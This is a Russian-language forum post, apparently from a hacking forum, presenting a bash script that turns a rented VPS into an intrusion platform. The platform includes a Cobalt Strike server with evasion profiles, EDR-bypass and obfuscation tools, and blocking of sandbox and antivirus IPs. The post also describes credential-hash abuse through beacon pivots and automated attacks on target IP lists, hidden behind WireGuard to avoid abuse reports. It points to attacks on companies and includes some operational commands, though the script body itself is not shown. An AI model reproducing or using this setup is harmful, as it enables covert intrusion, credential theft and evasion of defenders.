Уважаемые "Эхперты" и все остальные, нуждающиеся в услугах офтальмолога:
итого: 12268 символов. БЕЗ КОДА... куда только смотрят, эх((
#DEFINE: _GETPLUSHKI
#После прочтения этой статьи Вы получите:
#* рабочий скрипт создания VPS сервера для тестирования на проникноваение от A до Z
#* воспользоваться этим скриптом сможет любой. От самого соленого "Новичка" до, казалось-бы "Профессионала" ;-) Внутри - масса интересного: теперь Вам не нужно покупать "абузоустойчивые сервера для скана и брута" - скрипт сделает такой сервер за Вас! Единственное что потребуется от Вас - купить VPS помощнее и аккаунт VPN с wireguard. Дабы избежать рекламы этих сервисов, я намеренно не указываю тут названия, но Вы всегда можете (точнее как всегда) постучаться в личку с этим вопросом)) Вы сможете спать спокойно после череды атак но "корпы" - ведь Вы будете защищены на 150%! Вы получите графическую оболочку и клиент для работы через нее! А так же куча инструментов, которыми сможете воспользоваться после окончания работы скрипта. Каких? Читаем ниже ;-) Прошу не пинать, если вдруг статься принесла убыток Вашему бизнесу: я за диалог ;-)
#DEFINE: _ABOUT
#Все пишут о "поднятии локальных привелегий", о "уязвимостях нулевого дня (ранее я уже выкладывал парочку, можете глянуть в профиле) и прочих радостях, для пользователя, который только совершает первые шаги в этом направлении, совершенно недоступных, а иногда даже отпугивающих, вводящих в заблуждение. Поэтому я решил подойти к вопросу немного с другой стороны. Начну, как говорится, с начала. А именно - создания безопасного "рабочего места" и обеспечение пользователя инструментами первой небходимости. Нечто новое тут найдут так-же и "Профессионалы" индустрии. Спросите "с чего такая уверенность?". Отвечу: не мало людей пишут в личку (мы сейчас о "Профи"). Компетентность подобных - очень за "0". Без обид ;-) Читаем, исполняем и наслаждаемся =)
#Сразу хочу оговориться: для решения подобной задачи я выбрал и использую такую конфигурацию - 12 ядер, 64 ОЗУ, 1ТБ ссд.
#Обошлась подобная конфа - 150 долларов в год. Т.е. по 12,5$ в месяц. Подобное предложение сможете без труда отыскать в сети
#Везде пароли: p@ssw0rd
#DEFINE: _HOSTWEAPONISATION
#Ниже - скрипт обустройства хоста, который послужит нам платформой для нашей будущей экосистемы, в котором (и далее в других) я постараюсь максимально понятно, досутпно а главное с наивысшим КПД(*по моему мнению) выполнить эту, с одной стороны простую задачу. Но в любом уравнении всего существуют неизвестные, которые я постараюсь максимально раскрыть.
#В итоге мы получим необходимую базу, в которую вошли:
#----------------
#*cobalt-strike* сервер + malleable profile, который позволит Вам генерировать более устойчивый и "чистый" шеллкод
#*transfer.sh* - на :4466 порту - наверное самую необходимую в нашем нелегком деле штуку - очень быструю и понятную передачу файлов, как посредством curl `curl --upload-file /path/to/your/file https://your.domen:4466/any`, так и посредством веб-интерфейса https://your.domen:4466
#*VPS* - В числе улучшений - dnscrypt-proxy, выбранный по-умолчанию. т.к. в защите нуждаются не только TCP но и UDP трафик исходящий и поступающий на сервер, корректировка разных системных параметров, например поднятие числа -ulimit -n, создали SWAP и пр.
#*https-сертификат*, который нам понадобится для решения абсолютно разных задач. Он так же необходим cobalt-серверу, HTTPS-биконы с "правильным" сертификатом то-самое)
#*в sshd" были внесены две строчки, которые запрещают подключение по-паролю (КАК?? Вам никто не говорил их создавать и первыми делом
#*goodboyz* - спарсит один известный гист, в котором неравнодушные граждане делятся адресами и регексом ботов, песочниц, антивирусов и других нехороших редисок в правила iptables и ipset, с помощью которых мы прост заблокируем доступ 50-60% нашим основным непрятностям
#*в grub* - так же были внесены изменения, направленные на улучшение быстродействия и повышения уровня безопасноти ВПС
#---------------
#Помимо CobaltStrike сервера, так же в докер-контейнерах были подняты:
#GVM - народный любимец и безусловный лидер в сегменте сетевых сканеров, так же известный как OpenVas
#Ну и наконец был поднят контейнер с PatrowlHears, который является аналогом exploitdb, только, по моему мнение более удобным и "объемным"
#DEFINE: _DOCKERSCRIPT
#Пришло время познакомится поближе с докером и создать образ, который будет являться ключевым в нашей сегодняшней работе..
#В образ ОС, помимо окружения xfce4 вошли так же необходимые инструменты, которые позволят пользователю, как новичку, так уже и "бывалому" уменьшить время на проведение рутинных работ, инструменты для обфускации кода и другие. Вот список, который показался мне интересным и полезным:
#*golang* мы намеренно не установили из родного репо, т.к. компиляция некоторых инструментов требует последней доступной версии. именно ее мы и установили в систему
#*zsh, bat, nanorc, ls++* призваны сделать работы с командной строкой не только красочной, но и намного более комфортной, нежели со стандартным zsh или bash, которые представлены в репо
#*ghidra* так же самой последней возможной версией. если кто не в курсе - это декомпилятор, который мы увидели в связи с утечкой NSA 'ShadowBrokers'. NSA (это Агенство Национальной Безопасности Америки) и по сей день активно занимаются гидрой. Спасибо)
#*trans* перевод в вашем терминале от Google. trans 'Привет как дела?' -t en
#*oneforall* - это супербыстрый поиск субдоменов, доменов и айпи-адресов нужного вам ресурса
#*pwncat* - думаю в представлении не нуждается.. да, это тот самый "прокачанный netcat".
#*chimera* инструмент не менее известный, это обфускатор powershell скриптов, который включает множетсво методов и параметров
#*pe-tree* - название говорящее - позволяет увидеть структуру исполняемого файла, импорты, экспорты, энтропию и заголовки секций
#*garble*, а по совместительству враппер, заменяющий go при компиляции golang приложений
#*PEzor* известный фреймворк, который компилирует шеллкод либо бинарник в другие форматы, в том числе ReflectiveDLL. внимание на который, наверное стоит обратить всем, кто еще не успел познакомиться с этим чудесным методом управляемой инъекции. Но все-таки основная задача его установки - это установка необходимых компиляторов Windows приложений, таких как mingw-w64 и mono-mcs. Так же скрипт-установщик PEzor'а установит wclang (x86_64-w64-mingw32-clang), donut, sgn.
#*one-lin3r* очень полезная утилита, с помощью которой пользователь сможет получить подсказки по основным методам исполнения файла, так же внутри много способов дропа пейлоадов на целевую машину
#*Scarecrow* - это golang приложение, которое компилирует шеллкод по технике, называемой EDR evasion, призванной обходить одноименный компонент активной защиты Windows OS. Так же крайне важен принцип работы и ознакомление с ним
#*репозитории* инструментов таких маэстро сетевой безопасности, как mcgeeky и S3cur3Th1sSh1t, в которых каждый найдет кучу вкучностей и полезностей
#*arsenal* это супер-помощник пользователя, вызов которого мы зарегестрировали на комбинацию CTRL+A. это нужно увидеть, описывать бесполезно
#*wine tdm-gcc / wine gcc / wine g++* так же windows компилер, который дает неплохие результаты в плане обфускации-при-компиляции в случае его грамотного применения
#spiderfoot - мощнейший инструмент OSINT разведки. В настройках необходимо добавить как можно больше API ключей, предварительно их заполучив. Благо - в основном эти сервисы предоставляют минимум квоты, которой должно хватить нам на первое время
#-----------------------------------------
#Просто напоминаю, что подсказку по любым командам вы сможете найти в Google либо написав название утилиты -h (--help) XD
#DEFINE: _MAIN
#Ну вот и заключительная часть нашей "большой стройки" - собрание всего в кучу, под крыло wireguard и docker-compose. для этого мы создадим директорию, например /localhost , в которой в свою очередь напишем docker-compose.yml файл, с помощью которого мы и осуществим задуманное. Но прежде, чем сделать это, Вам необходимо обзавестись wireguard.conf - конфигурационным файлом wireguard. Вы сможете сделать это купив аккаунт wireguard-vpn (предпочтительнее), либо использовать чей-то сервер в качестве хоста-впн. Инструкций и автоматических установщиков море - смысла их тут приводить вообще нет. Итак наш туннель.conf следую положить в папку /etc/wireguard/socks/wg.conf , либо в любую другую, поправив при этом скрипт ниже. Обратите внимание: докер не любит ipv6 сети, соответственно все ipv6 адреса так же следует удалить из файла конфигурации туннеля.
#... и файл up.sh, который будет перзапускать контейнеры и комментировать изменения в контейнерах, попутно чистить ОЗУ и кеш перед перезапуском
#DEFINE: _EXIT
#Наши практики освоения bash-скриптинга подходят к концу. Но какая же это статья на проникновение, спросите Вы? Отвечу - самое сладкое - оставляют на десерт)))
#Напишем простейший, но тем не менее очень мощный скрипт для кобальта, а так же Linux-GUI хелпер, который придаст эстетики и юзабельности нашему NetworkAbuser'у (так я его назвал)))
#Принцип работы крайне прост. Сначала кобальт создает SOCKS4 Pivot через интересующий Вас бикон. После этого открывается GUI интерфейс, в котором необходимо будет указать CIDR (что то типа 192.168.2.0/24), имя пользователя и HASH, заполучить которые крайне просто - в консоле бикона выполить hashdump
#При первом использовании необходимо будет подключить скрипт, который находится в /opt/cobaltstrike/custom/abuser.cna, ну и другие скрипты, какие хотите
#Ну и самое последнее, как я и говорил ранее - мы создадим клиента под windows и linux, для работы с системой, использую chrome + java
#DEFINE: _PS
#Вот и финальчик, так что в итоге? А в итоге мы имеем экосистему, включающую в себя свою сеть, работающую внутри контейнеров, которые в свою очередь шифруют трафик через wireguard-контейнер. Этим мы достигаем несколько абсолютно-важных целей: мы прячем наш трафик от глаз провайдера, в том числе сканера GVM, а так же создаем дополнительный слой шифрования, при этом шансы на абуз стремительно стремятся к нулю. Но все таки, конечно, лучше не юзать Ваш хост как Direct connect Для биконов. Для этого существуют редиректоры, инфы по которым предостаточно, они очень просты в установке. Работа через клиенты обеспечит нам так же необходимо-достигнутый уровень защиты, а именно, при работе через VPN получаем ТРИ!!! уровня защиты, два из которых защищены ключами шифрования, которые по одному-то практически нереально взломать, а в такой сцепке и вовсе становится нереально до вас добраться. Ну а как работает NetworkAbuser и аналогичную систему с моими наработками, сможете увидеть на видео, которое находится ниже. Скомпилированные клиенты доступны по адресу http://ваш.домен:50000
#Почему модульный? Все просто: Вы сможете добавить любой контейнер в /localhost/docker-compose.yml, который так же будет работать через wireguard и провайдер не сможет увидеть ничего, ни байта из трафика, вызванного Вашими невинными шалостями))) Например:
#Станет доступен модифицированный и глвное работающий coutto/jok3r:
#docker exec -ti jok3r zsh
#wget -O /targets.txt http://ваш.линк/на/список/ip-адресов/которые/вы/хотитет/"протестировать".txt
#attack
#У вас спросят два вопроса - местоположение того самого списка и название workspace (это название БД, куда будут собираться результаты). После этого джокер начнет разведку и атаку, а после выдаст ссылку на отчет. Инструментов внутри - что-то около 103. Самых серьезных ;-) Как вегда все произойдет автоматически)))
#Как бонус - Вы можете сменить тему кали - в настройках графической оболочки - выберите unkn0wn в меню Appearance и Windows Manager ;-)
#Как бонус2 - cd /opt/cobaltstrike/Toolkits ; unzip artifact.zip ; cd artifact ; bash winebuild.sh | Выполнять из-под графической оболочки, после того, как подключите свежеиспеченный artifact.cna из папок /opt/cobaltstrike/Toolkits/artifact/dist* ваши биконы станут менее заметны ;-)
#Как бонус3 - интерфейсы GVM , PatrowlHears и spiderfoot - защита от дурака))) если по-русски - "найдете сами" =)
#Ну и для тех, кто не понял формат написанной статьи - это абсолютно рабочий bash скрипт, который Вы сможете исполнить на свежекупленном хосте и получить результат из коробки))) просто загрузите скрипт на VPS например так: scp script.sh VPS:/root ; ssh VPS ; chmod +x script.sh ; ./script.sh ВАШ.ДОМЕН Не благодарите)
Нажмите, чтобы раскрыть...
итого: 12268 символов. БЕЗ КОДА... куда только смотрят, эх((